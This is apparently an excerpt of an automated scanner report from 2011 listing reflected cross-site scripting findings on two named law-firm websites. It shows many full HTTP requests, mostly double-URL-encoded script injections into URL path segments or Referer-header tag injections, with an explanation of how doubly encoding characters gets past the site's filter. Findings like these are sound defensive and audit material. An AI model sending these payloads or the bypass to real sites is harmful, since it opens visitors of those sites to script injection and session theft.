GET /rss/practices/Public_Policybf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 was submitted in the REST URL parameter 4. This input was echoed as cc78d"><script>alert(1)</script>35e1d1edf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Public_Policy/rss.xmlcc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202 was submitted in the REST URL parameter 1. This input was echoed as 8e1f4"><script>alert(1)</script>0a2d2f96202 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202/practices/White_Collar_Defense/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4 was submitted in the REST URL parameter 2. This input was echoed as 68e4a"><script>alert(1)</script>dceb9945ee4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4/White_Collar_Defense/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4 was submitted in the REST URL parameter 3. This input was echoed as 74b35"><script>alert(1)</script>3123ddbb2f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/White_Collar_Defense74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 was submitted in the REST URL parameter 4. This input was echoed as b3f91"><script>alert(1)</script>069fcdb3970 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/White_Collar_Defense/rss.xmlb3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad was submitted in the REST URL parameter 1. This input was echoed as 85268"><script>alert(1)</script>8395fd2c6ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad/publications/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518 was submitted in the REST URL parameter 2. This input was echoed as 438f3"><script>alert(1)</script>2ac3b841518 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/publications438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 was submitted in the REST URL parameter 3. This input was echoed as d7207"><script>alert(1)</script>5a1738ffeb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/publications/rss.xmld7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 was submitted in the REST URL parameter 1. This input was echoed as 53325"><script>alert(1)</script>5cfc2555b00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /x2253325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.226. http://www.wileyrein.com/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wileyrein.com
Path:
/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b894"><script>alert(1)</script>8dd0074b00e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /x22?4b894"><script>alert(1)</script>8dd0074b00e=1 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56449"><a>3c0af12941a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arnoldporter.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=56449"><a>3c0af12941a
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18264165;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/ Set-Cookie: CFTOKEN=19385056;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a813"><a>7b216e3e1ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_diversity_our_values.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=1a813"><a>7b216e3e1ad
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7be1"><a>6b37d6049c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=a7be1"><a>6b37d6049c6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18dcd"><a>1951d83601 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_recognition.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=18dcd"><a>1951d83601
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e576"><a>6afa9807f84 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_recognition_rankings.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=7e576"><a>6afa9807f84
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d86c8"><a>12209855120 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_who_we_are.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=d86c8"><a>12209855120
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:26:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c51"><a>3e7a64ab71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /advisory.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=47c51"><a>3e7a64ab71
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f57f0"><a>27be33cf6b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /careers.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=f57f0"><a>27be33cf6b9
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:26:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a4c"><a>7d008f3eaa6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
